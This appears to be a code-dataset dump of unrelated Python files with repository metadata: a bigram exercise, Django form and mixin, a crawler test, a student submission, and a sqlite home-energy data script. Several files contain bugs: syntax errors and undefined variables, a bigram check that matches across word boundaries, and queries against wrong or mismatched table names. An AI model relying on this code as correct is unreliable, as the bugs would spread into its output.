"luungoc2005@gmail.com"
] | luungoc2005@gmail.com |
5cac8cdc56b579d7b87c1b9d6a558ed496f54f49 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /7QPHWACcDihT3AM6b_6.py | 42998e86441fe6f7df22cf74314d844cef6aab32 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | """
You are given an input array of bigrams, and an array of words.
Write a function that returns `True` if **every single bigram** from this
array can be found at least **once** in an array of words.
### Examples
can_find(["at", "be", "th", "au"], ["beautiful", "the", "hat"]) ➞ True
can_find(["ay", "be", "ta", "cu"], ["maybe", "beta", "abet", "course"]) ➞ False
# "cu" does not exist in any of the words.
can_find(["th", "fo", "ma", "or"], ["the", "many", "for", "forest"]) ➞ True
can_find(["oo", "mi", "ki", "la"], ["milk", "chocolate", "cooks"]) ➞ False
### Notes
* A **bigram** is string of two consecutive characters in the same word.
* If the list of words is empty, return `False`.
"""
def can_find(bigrams, words):
for bi in bigrams:
if bi not in ''.join(words):
return False
return True
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
cd9d8b0b39e0e09d7940516635e9a94f971f38fc | 7f4886802e83352f37d35509b7775c93c2756105 | /accounts/forms.py | db5c1f9a162a945c87a84c42d50cf009988f7614 | [] | no_license | JihyeKim0923/lion10 | c23a019c3725de2d9f70556993db1ed3e8d6ae2e | 2b76dc9290bec6f4d827a625b2f0b1e92c85ed53 | refs/heads/master | 2020-06-19T02:56:24.746341 | 2019-07-11T15:40:17 | 2019-07-11T15:40:17 | 196,539,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django import forms
class CreateUserForm(UserCreationForm):
email=forms.EmailField(required=True)
nickname=forms.CharField(required=True)
class Meta:
model=User
fields=("username","email","nickname","password1","password2")
def save(self, commit=True):
user=super(CreateUserForm,self).save(commit=False)
user.nickname=self.cleaned_data["nickname"]
user.email=self.cleaned_data["email"]
if commit:
user.save()
return user | [
"sos13313@naver.com"
] | sos13313@naver.com |
f0b3710c6bf6eebf47cd69db345fc58831d7d39c | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/308/usersdata/295/73012/submittedfiles/ex1.py | d7faface2964c55c9b074fbe6eed286761f20fc3 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | # -*- coding: utf-8 -*-
from __future__ import division
a = input('Digite a: ')
b = input('Digite b: ')
c = input('Digite c: ')
#COMECE A PARTIR DAQUI!
a = input('Digite a: ')
b = input('Digite b: ')
c = input('Digite c: ')
f = a*(x**2) + b*x + c
if DH>0
print("X1 e X2")
else:
print("SRR")
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
8c24505675dcd7f8269bbafc518d90b57b7317eb | 71fb2f3ab9c0111cb491a50ed59988dd5fdc5235 | /login/mixins.py | 03bb7f0ecfe1bef50dd2f3cbf13ab7fed6bd25f6 | [
"BSD-3-Clause"
] | permissive | manezinho/EMSTrack-Django | f69d200a35bb95d0ace8bca34b12a841ca7fca24 | 91723944abcaf3b258ff52c1b8bad1ed532d8f0a | refs/heads/master | 2022-11-15T08:46:07.891927 | 2020-06-03T04:54:19 | 2020-06-03T04:54:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | from mqtt.cache_clear import mqtt_cache_clear
class ClearPermissionCacheMixin:
def save(self, *args, **kwargs):
# save to UserProfile
super().save(*args, **kwargs)
# invalidate permissions cache
mqtt_cache_clear()
def delete(self, *args, **kwargs):
# delete from UserProfile
super().delete(*args, **kwargs)
# invalidate permissions cache
mqtt_cache_clear()
| [
"mcdeoliveira@earthlink.net"
] | mcdeoliveira@earthlink.net |
f7132cf3933990eadc7239ea00b892c2ab3f8b43 | d5e974c65ed58c5e62e09eb49de0754230b9f68a | /crawler/crawler_test.py | 1543a4c26b9d656acedd6cae00c413f9b28394f4 | [] | no_license | kjyggg-sketch/wordcloud | 224d28922768403f378c9ef220db5cf00bcc16ab | 86137dab4bb9683dc9495d6ad5b76fb4e7bdd836 | refs/heads/master | 2022-12-28T16:15:34.680973 | 2020-10-12T03:57:47 | 2020-10-12T03:57:47 | 276,003,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 975 | py | from crawler import navershopping
from crawler import naverblog
from crawler import bigkinds
#
# bigkinds.crawl(keyword='4차산업',
# startDate='2017-01-01',endDate='2020-04-01', nCrawl=100)
naverblog.crawl(keyword='데이터바우처',
startDate='2020-06-01',
endDate='2020-06-09',
nCrawl = 500)
# naverblog.crawl(keyword='바나나',
# startDate='2020-01-01',
# endDate='2020-05-31',
# nCrawl = 5000)
# navershopping.crawl("전자담배",
# 'https://smartstore.naver.com/ibholdings/products/4050389904?NaPm=ct%3Dkapcytsw%7Cci%3Ded4ec39f12b11008b2b8b38d4aa9754a14ad5590%7Ctr%3Dslsl%7Csn%3D791544%7Cic%3D%7Chk%3D11dd8f4f22874fda5fb99f3758fdc13f60935474',
# '궐련형 전자담배 죠즈20up jouz 아이코스3 듀오 릴플러스 차이코스 s 호환 20연타',
# comment="navershopping_test")
| [
"jykim@almaden.co.kr"
] | jykim@almaden.co.kr |
b68b80f86534d69c452cc1ff2a9135f02797455f | b10302009a97c00650a99a474bd266145b35c088 | /sqlite_database.py | 64ca554eb2e778d9e14343266271bab6955aa934 | [] | no_license | robynkwamo/RUBi | 2dce8c17d71cf90c0254ec69b8811da17101897d | 2dce8be4795b8be0e45d9e1e209335a4311f24be | refs/heads/master | 2020-07-01T13:48:48.309527 | 2019-08-08T06:29:49 | 2019-08-08T06:29:49 | 201,187,713 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41,762 | py | import sqlite3
from data import *
#### create a database file ####
conn = sqlite3.connect('dataHub.db')
####**** create a memory database for testing only ****####
# conn = sqlite3.connect(':memory:')
#### create a cursor to read through the database ####
c = conn.cursor()
#### drop table if exist ####
c.execute('DROP TABLE IF EXISTS totalSolar1')
c.execute('DROP TABLE IF EXISTS powerCostWeek1')
c.execute('DROP TABLE IF EXISTS powerCostWeekend1')
c.execute('DROP TABLE IF EXISTS isHomeWeek1')
c.execute('DROP TABLE IF EXISTS isHomeWeekend1')
c.execute('DROP TABLE IF EXISTS isSleepingWeek1')
c.execute('DROP TABLE IF EXISTS isSleepingWeekend1')
c.execute('DROP TABLE IF EXISTS isLightWeek1')
c.execute('DROP TABLE IF EXISTS isLightWeekend1')
c.execute('DROP TABLE IF EXISTS waterheaterPowerWeek1')
c.execute('DROP TABLE IF EXISTS LightPowerWeek1')
c.execute('DROP TABLE IF EXISTS LightPowerWeekend1')
c.execute('DROP TABLE IF EXISTS totalStaticPowerUsedWeek1')
c.execute('DROP TABLE IF EXISTS totalStaticPowerUsedWeekend1')
c.execute('DROP TABLE IF EXISTS tempPrefSimple0')
c.execute('DROP TABLE IF EXISTS tempPrefWeek1')
c.execute('DROP TABLE IF EXISTS tempPrefWeekend1')
c.execute('DROP TABLE IF EXISTS freeVariable')
c.execute('DROP TABLE IF EXISTS acPowerWeek')
c.execute('DROP TABLE IF EXISTS acPowerWeekend')
c.execute('DROP TABLE IF EXISTS carChargerPowerWeek')
c.execute('DROP TABLE IF EXISTS carChargerPowerWeekend')
#??????????????????????????????????????????????? TO DO LIST ???????????????????????????????????????????????????????????#
# Change some functions name to make them shorter #
# #
#??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????#
##########################******************** Unique variable import ******************################################
panelPower = panelPower
numPanels = numPanels
numLights = numLights
oneLightPower = oneLightPower
outsideTemp = outsideTemp
indoorTemp = indoorTemp
sleepingTemp = sleepingTemp
##########################******************** create a totalSolar1 table ******************############################
c.execute(""" CREATE TABLE IF NOT EXISTS totalSolar1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
powerAvailable INTEGER )""")
#### Insertion Methods in the database for totalSolar1 table ####
def insert_hourly_power(): # insert hourly power generated by the solar panel
with conn:
i = 0
for item in totalSolarAvailable:
c.execute("INSERT INTO totalSolar1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert totalSolarAvailable in database ####
insert_hourly_power()
def get_hourly_power_by_daytime_from_db(dayTime): # get hourly power by id
c.execute("SELECT powerAvailable FROM totalSolar1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM totalSolar1") #### for debug only ####
return c.fetchone()
#### Get the value of the power generated at x hour of the day ####
def convert_to_integer_get_hourly_power_by_daytime_from_db(dayTime):
y = get_hourly_power_by_daytime_from_db(dayTime)
z = y[0]
return z
#print("The power generated at ", x, "is: ", z) #### For debug only ####
#############################****************** create a powerCostWeek table *******************########################
c.execute(""" CREATE TABLE IF NOT EXISTS powerCostWeek1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
powerCost INTEGER )""")
#### Insertion Methods in the database for powerCostWeek1 table ####
def insert_power_cost_week(): # insert hourly power cost for week
with conn:
i = 0
for item in powerCostWeek:
c.execute("INSERT INTO powerCostWeek1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert powerCostWeek data in database ####
insert_power_cost_week()
def get_hourly_power_cost_by_daytime_week_from_db(dayTime): # get hourly power for week by id dayTime
c.execute("SELECT powerCost FROM powerCostWeek1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM powerCostWeek1") #### For debug only ####
return c.fetchone()
#### convert the value of the power cost at x hour of the day during the week to int ####
def convert_to_integer_get_hourly_power_cost_by_daytime_week_from_db(dayTime):
y = get_hourly_power_cost_by_daytime_week_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_power_cost_by_daytime_from_db()) #### For debug only ####
#############################****************** create a powerCostWeekend table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS powerCostWeekend1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
powerCost INTEGER )""")
#### Insertion Methods in the database for powerCostWeekend1 table ####
def insert_power_cost_weekend(): # insert hourly power cost for weekend
with conn:
i = 0
for item in powerCostWeekend:
c.execute("INSERT INTO powerCostWeekend1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert powerCostWeek data in database ####
insert_power_cost_weekend()
def get_hourly_power_cost_by_daytime_weekend_from_db(dayTime): # get hourly power for weekend by id dayTime
c.execute("SELECT powerCost FROM powerCostWeekend1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM powerCostWeekend1") ### For debug only ####
return c.fetchone()
#### convert the value of the power cost at x hour of the day to int ####
def convert_to_integer_get_hourly_power_cost_by_daytime_weekend_from_db(dayTime):
y = get_hourly_power_cost_by_daytime_weekend_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_power_cost_by_daytime_weekend_from_db()) #### For debug only ####
#############################****************** create a isHomeWeek1 table *******************###########################
c.execute(""" CREATE TABLE IF NOT EXISTS isHomeWeek1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
isHome INTEGER )""")
#### Insertion Methods in the database for isHomeWeek1 table ####
def insert_isHomeWeek1(): # insert when the customer is home for the week ( 0 for not home and 1 for when he is home)
with conn:
i = 0
for item in isHomeWeek:
c.execute("INSERT INTO isHomeWeek1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert when customer is home in database ####
insert_isHomeWeek1()
def get_hourly_isHomeweek_from_db(dayTime): # get hourly when customer is home for week by id / dayTime
c.execute("SELECT isHome FROM isHomeWeek1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM isHomeWeek1") ### For debug only ####
return c.fetchone()
#### convert the value of when customer is home at x hour of the day to int ####
def convert_to_int_get_hourly_isHomeweek_from_db(dayTime):
y = get_hourly_isHomeweek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_isHomeweek_from_db()) #### For debug only ####
#############################****************** create a isSleepingWeek1 table *******************######################
c.execute(""" CREATE TABLE IF NOT EXISTS isSleepingWeek1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
isSleeping INTEGER )""")
#### Insertion Methods in the database for isHomeWeek1 table ####
def insert_isSleepingWeek1(): # insert when the customer is home for the week ( 0 for not home and 1 for when he is home)
with conn:
i = 0
for item in isSleepingWeek:
c.execute("INSERT INTO isSleepingWeek1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert when customer is home in database ####
insert_isSleepingWeek1()
def get_hourly_isSleepingWeek_from_db(dayTime): # get hourly when customer is home for week by id / dayTime
c.execute("SELECT isSleeping FROM isSleepingWeek1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM isSleepingWeek1") ### For debug only ####
return c.fetchone()
#### convert the value of when customer is home at x hour of the day to int ####
def convert_to_int_get_hourly_isSleepingWeek_from_db(dayTime):
y = get_hourly_isSleepingWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_isSleepingWeek_from_db()) #### For debug only ####
#############################****************** create a isHomeWeekend1 table *******************#######################
c.execute(""" CREATE TABLE IF NOT EXISTS isHomeWeekend1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
isHome INTEGER )""")
#### Insertion Methods in the database for isHomeWeekend1 table ####
def insert_isHomeWeekend1(): # insert when the customer is home for the weekend ( 0 for not home and 1 for when he is home)
with conn:
i = 0
for item in isHomeWeekend:
c.execute("INSERT INTO isHomeWeekend1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert when customer is home in database ####
insert_isHomeWeekend1()
def get_hourly_isHomeweekend_from_db(dayTime): # get hourly when customer is home for week by id / dayTime
c.execute("SELECT isHome FROM isHomeWeekend1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM isHomeWeekend1") ### For debug only ####
return c.fetchone()
#### convert the value of when customer is home at x hour of the day to int ####
def convert_to_int_get_hourly_isHomeweekend_from_db(dayTime):
y = get_hourly_isHomeweekend_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_isHomeweekend_from_db()) #### For debug only ####
#############################****************** create a isSleepingWeeken1 table *******************######################
c.execute(""" CREATE TABLE IF NOT EXISTS isSleepingWeekend1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
isSleeping INTEGER )""")
#### Insertion Methods in the database for isHomeWeek1 table ####
def insert_isSleepingWeekend1(): # insert when the customer is sleeping on the weekend ( 0 for not sleeping and 1 for sleeping)
with conn:
i = 0
for item in isSleepingWeekend:
c.execute("INSERT INTO isSleepingWeekend1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert when customer is home in database ####
insert_isSleepingWeekend1()
def get_hourly_isSleepingWeekend_from_db(dayTime): # get hourly when customer is home for weekend by id / dayTime
c.execute("SELECT isSleeping FROM isSleepingWeek1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM isSleepingWeekend1") ### For debug only ####
return c.fetchone()
#### convert the value of when customer is home at x hour of the day to int ####
def convert_to_int_get_hourly_isSleepingWeekend_from_db(dayTime):
y = get_hourly_isSleepingWeekend_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_isSleepingWeekend_from_db()) #### For debug only ####
#############################****************** create a isLightWeek1 table *******************#########################
c.execute(""" CREATE TABLE IF NOT EXISTS isLightWeek1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
isLight INTEGER )""")
#### Insertion Methods in the database for isLightWeek1 table ####
def insert_isLightWeek1(): # insert when the is on during the week ( 0 for off and 1 for on)
with conn:
i = 0
for item in isLightWeek:
c.execute("INSERT INTO isLightWeek1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert when the light are on during the week in database ####
insert_isLightWeek1()
def get_hourly_isLightWeek_from_db(dayTime): # get hourly when are on for week by id / dayTime
c.execute("SELECT isLight FROM isLightWeek1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM isLightWeek1") ### For debug only ####
return c.fetchone()
#### convert the value of when the light are on at x hour of the day to int ####
def convert_to_int_get_hourly_isLightWeek_from_db(dayTime):
y = get_hourly_isLightWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_isLightWeek_from_db()) #### For debug only ####
#############################****************** create a isLightWeekend1 table *******************######################
c.execute(""" CREATE TABLE IF NOT EXISTS isLightWeekend1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
isLight INTEGER )""")
#### Insertion Methods in the database for isLightWeek1 table ####
def insert_isLightWeekend1(): # insert when the is on during the weekend ( 0 for off and 1 for on)
with conn:
i = 0
for item in isLightWeekend:
c.execute("INSERT INTO isLightWeekend1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert when the light are on during the weekend in database ####
insert_isLightWeekend1()
def get_hourly_isLightWeekend_from_db(dayTime): # get hourly when are on for weekend by id / dayTime
c.execute("SELECT isLight FROM isLightWeekend1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM isLightWeekend1") ### For debug only ####
return c.fetchone()
#### convert the value of when the light are on at x hour of the day to int ####
def convert_to_int_get_hourly_isLightWeekend_from_db(dayTime):
y = get_hourly_isLightWeekend_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_isLightWeekend_from_db()) #### For debug only ####
#############################****************** create a waterheaterPowerWeek1 table *******************#################
c.execute(""" CREATE TABLE IF NOT EXISTS waterheaterPowerWeek1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
isOn INTEGER )""")
#### Insertion Methods in the database for waterheaterPowerWeek1 table ####
def insert_waterheaterPowerWeek1(): # insert when the waterheater is on during the week ( 0 for off and 1 for on)
with conn:
i = 0
for item in WaterheaterPowerWeek:
c.execute("INSERT INTO WaterheaterPowerWeek1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert when the light are on during the weekend in database ####
insert_waterheaterPowerWeek1()
def get_hourly_waterheaterPowerWeek_from_db(dayTime): # get hourly when are on for weekend by id / dayTime
c.execute("SELECT isOn FROM WaterheaterPowerWeek WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM WaterheaterPowerWeek") ### For debug only ####
return c.fetchone()
#### convert the value of when the waterheater is on at x hour of the day to int ####
def convert_to_int_get_hourly_waterheaterPowerWeek_from_db(dayTime):
y = get_hourly_waterheaterPowerWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_waterheaterPowerWeek_from_db()) #### For debug only ####
#############################****************** create a LightPowerWeek1 table *******************######################
c.execute(""" CREATE TABLE IF NOT EXISTS LightPowerWeek1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
lightCost INTEGER )""")
#### Insertion Methods in the database for LightPowerWeek1 table ####
def insert_LightPowerWeek1(): # insert when the light cost is on during the week ( 0 for off and 1 for on)
with conn:
i = 0
for item in LightPowerWeek:
c.execute("INSERT INTO LightPowerWeek1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert what power the light consume during the week in database ####
insert_LightPowerWeek1()
def get_hourly_LightPowerWeek_from_db(dayTime): # get hourly power consumption are on for week by id / dayTime
c.execute("SELECT lightCost FROM LightPowerWeek1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM LightPowerWeek1") ### For debug only ####
return c.fetchone()
#### convert the value of when the LightPowerWeek consume at x hour of the day to int ####
def convert_to_int_get_hourly_LightPowerWeek_from_db(dayTime):
y = get_hourly_LightPowerWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_LightPowerWeek_from_db())
#############################****************** create a LightPowerWeekend1 table *******************######################
c.execute(""" CREATE TABLE IF NOT EXISTS LightPowerWeekend1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
lightCost INTEGER )""")
#### Insertion Methods in the database for LightPowerWeekend1 table ####
def insert_LightPowerWeekend1(): # insert when the light cost is on during the weekend ( 0 for off and 1 for on)
with conn:
i = 0
for item in LightPowerWeekend:
c.execute("INSERT INTO LightPowerWeekend1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert what power the light consume during the weekend in database ####
insert_LightPowerWeekend1()
def get_hourly_LightPowerWeekend_from_db(dayTime): # get hourly power consumption are on for weekend by id / dayTime
c.execute("SELECT lightCost FROM LightPowerWeekend1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM LightPowerWeekend1") ### For debug only ####
return c.fetchone()
#### convert the value of when the LightPowerWeekend1 consume at x hour of the day to int ####
def convert_to_int_get_hourly_LightPowerWeekend_from_db(dayTime):
y = get_hourly_LightPowerWeekend_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_LightPowerWeek_from_db())
#############################****************** create a totalStaticPowerUsedWeek1 table *******************############
c.execute(""" CREATE TABLE IF NOT EXISTS totalStaticPowerUsedWeek1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
staticPowerUsed INTEGER )""")
#### Insertion Methods in the database for totalStaticPowerUsedWeek table ####
def insert_totalStaticPowerUsedWeek1(): # insert what is the total power consume with Waterheater, FridgePower, LightPowerWeek during week day
with conn:
i = 0
for item in totalStaticPowerUsedWeek:
c.execute("INSERT INTO totalStaticPowerUsedWeek1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert total power consumption in database ####
insert_totalStaticPowerUsedWeek1()
def get_hourly_totalStaticPowerUsedWeek_from_db(dayTime): # get hourly power static consumption for week by id / dayTime
c.execute("SELECT staticPowerUsed FROM totalStaticPowerUsedWeek1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM totalStaticPowerUsedWeek1") ### For debug only ####
return c.fetchone()
#### convert the value of when the totalStaticPowerUsedWeek1 consume at x hour of the day to int ####
def convert_to_int_get_hourly_totalStaticPowerUsedWeek_from_db(dayTime):
y = get_hourly_totalStaticPowerUsedWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_totalStaticPowerUsedWeek_from_db())
#############################****************** create a totalStaticPowerUsedWeekend1 table *******************############
c.execute(""" CREATE TABLE IF NOT EXISTS totalStaticPowerUsedWeekend1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
staticPowerUsed INTEGER )""")
#### Insertion Methods in the database for totalStaticPowerUsedWeekend table ####
def insert_totalStaticPowerUsedWeekend1(): # insert what is the total power consume with Waterheater, FridgePower, LightPowerWeek during weekend days
with conn:
i = 0
for item in totalStaticPowerUsedWeekend:
c.execute("INSERT INTO totalStaticPowerUsedWeekend1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert total power consumption in database ####
insert_totalStaticPowerUsedWeekend1()
def get_hourly_totalStaticPowerUsedWeekend_from_db(dayTime): # get hourly power static consumption for weekend days by id / dayTime
c.execute("SELECT staticPowerUsed FROM totalStaticPowerUsedWeekend1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM totalStaticPowerUsedWeekend1") ### For debug only ####
return c.fetchone()
#### convert the value of when the totalStaticPowerUsedWeekend1 consume at x hour of the day to int ####
def convert_to_int_get_hourly_totalStaticPowerUsedWeekend_from_db(dayTime):
y = get_hourly_totalStaticPowerUsedWeekend_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_totalStaticPowerUsedWeekend_from_db())
#############################****************** create a tempPrefSimple0 table *******************############
c.execute(""" CREATE TABLE IF NOT EXISTS tempPrefSimple0 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
prefTemp INTEGER )""")
#### Insertion Methods in the database for tempPrefSimple0 table ####
def insert_tempPrefSimple(): # insert what is the prefered temperature
with conn:
i = 0
for item in tempPrefSimple0:
c.execute("INSERT INTO tempPrefSimple0 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert preferred temperature in database ####
insert_tempPrefSimple()
def get_hourly_tempPrefSimple0_from_db(dayTime): # get hourly prefered temperature days by id / dayTime
c.execute("SELECT prefTemp FROM tempPrefSimple0 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM tempPrefSimple0") ### For debug only ####
return c.fetchone()
#### convert the value of when the tempPrefSimple0 temperature at x hour of the day to int ####
def convert_to_int_get_hourly_tempPrefSimple_from_db(dayTime):
y = get_hourly_tempPrefSimple0_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_tempPrefSimple0_from_db())
#############################****************** create a tempPrefWeek0 table *******************########################
c.execute(""" CREATE TABLE IF NOT EXISTS tempPrefWeek1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
prefTemp INTEGER )""")
#### Insertion Methods in the database for tempPrefSimple0 table ####
def insert_tempPrefWeek1(): # insert what is the preferred temperature during week days
with conn:
i = 0
for item in tempPrefWeek1:
c.execute("INSERT INTO tempPrefWeek1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert preferred temperature during the week in database ####
insert_tempPrefWeek1()
def get_hourly_tempPrefWeek1_from_db(dayTime): # get hourly prefered temperature days during week days by id / dayTime
c.execute("SELECT prefTemp FROM tempPrefWeek1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM tempPrefWeek1") ### For debug only ####
return c.fetchone()
#### convert the value of when the tempPrefWeek1 temperature at x hour of the day to int ####
def convert_to_int_get_hourly_tempPrefWeek1_from_db(dayTime):
y = get_hourly_tempPrefWeek1_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_tempPrefWeek1_from_db())
#############################****************** create a tempPrefWeekend0 table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS tempPrefWeekend1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
prefTemp INTEGER )""")
#### Insertion Methods in the database for tempPrefSimple0 table ####
def insert_tempPrefWeekend1(): # insert what is the preferred temperature during weekend days
with conn:
i = 0
for item in tempPrefWeekend1:
c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert preferred temperature during the weekend in database ####
insert_tempPrefWeekend1()
def get_hourly_tempPrefWeekend1_from_db(dayTime): # get hourly prefered temperature days during weekend days by id / dayTime
c.execute("SELECT prefTemp FROM tempPrefWeekend1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM tempPrefWeekend1") ### For debug only ####
return c.fetchone()
#### convert the value of when the tempPrefWeekend1 temperature at x hour of the day to int ####
def convert_to_int_get_hourly_tempPrefWeekend1_from_db(dayTime):
y = get_hourly_tempPrefWeekend1_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_tempPrefWeekend1_from_db())
#############################****************** create a tempPrefWeekend0 table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS tempPrefWeekend1 (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
prefTemp INTEGER )""")
#### Insertion Methods in the database for tempPrefSimple0 table ####
def insert_tempPrefWeekend1(): # insert what is the preferred temperature during weekend days
with conn:
i = 0
for item in tempPrefWeekend1:
c.execute("INSERT OR IGNORE INTO tempPrefWeekend1 VALUES (?, ?)", (i, item))
i = i + 1
#### Insert preferred temperature during the weekend in database ####
insert_tempPrefWeekend1()
def get_hourly_tempPrefWeekend1_from_db(dayTime): # get hourly prefered temperature days during weekend days by id / dayTime
c.execute("SELECT prefTemp FROM tempPrefWeekend1 WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM tempPrefWeekend1") ### For debug only ####
return c.fetchone()
#### convert the value of when the tempPrefWeekend1 temperature at x hour of the day to int ####
def convert_to_int_get_hourly_tempPrefWeekend1_from_db(dayTime):
y = get_hourly_tempPrefWeekend1_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_tempPrefWeekend1_from_db())
#############################****************** create a acPowerWeek table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS acPowerWeek (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
powerUsed INTEGER )""")
#### Insertion Methods in the database for acPowerWeek table ####
def insert_acPowerWeek(): # insert what is the ac power consumption during week days
with conn:
i = 0
for item in acPowerWeek:
c.execute("INSERT OR IGNORE INTO acPowerWeek VALUES (?, ?)", (i, item))
i = i + 1
#### Insert ac power consumption during the week in database ####
insert_acPowerWeek()
def get_hourly_acPowerWeek_from_db(dayTime): # get hourly power consumption during week days by id / dayTime
c.execute("SELECT powerUsed FROM acPowerWeek WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM acPowerWeek") ### For debug only ####
return c.fetchone()
#### convert the value of when the tempPrefWeekend1 temperature at x hour of the day to int ####
def convert_to_int_get_hourly_acPowerWeek_from_db(dayTime):
y = get_hourly_acPowerWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_acPowerWeek_from_db())
#############################****************** create a acPowerWeekend table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS acPowerWeekend (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
powerUsed INTEGER )""")
#### Insertion Methods in the database for acPowerWeekend table ####
def insert_acPowerWeekend(): # insert what is the ac power consumption during weekend days
with conn:
i = 0
for item in acPowerWeekend:
c.execute("INSERT OR IGNORE INTO acPowerWeekend VALUES (?, ?)", (i, item))
i = i + 1
#### Insert ac power consumption during the weekend in database ####
insert_acPowerWeekend()
def get_hourly_acPowerWeekend_from_db(dayTime): # get hourly power consumption during weekend days by id / dayTime
c.execute("SELECT powerUsed FROM acPowerWeekend WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM acPowerWeekend") ### For debug only ####
return c.fetchone()
#### convert the value of when the tempPrefWeekend1 temperature at x hour of the day to int ####
def convert_to_int_get_hourly_acPowerWeekend_from_db(dayTime):
y = get_hourly_acPowerWeekend_from_db(dayTime)
z = y[0]
return z
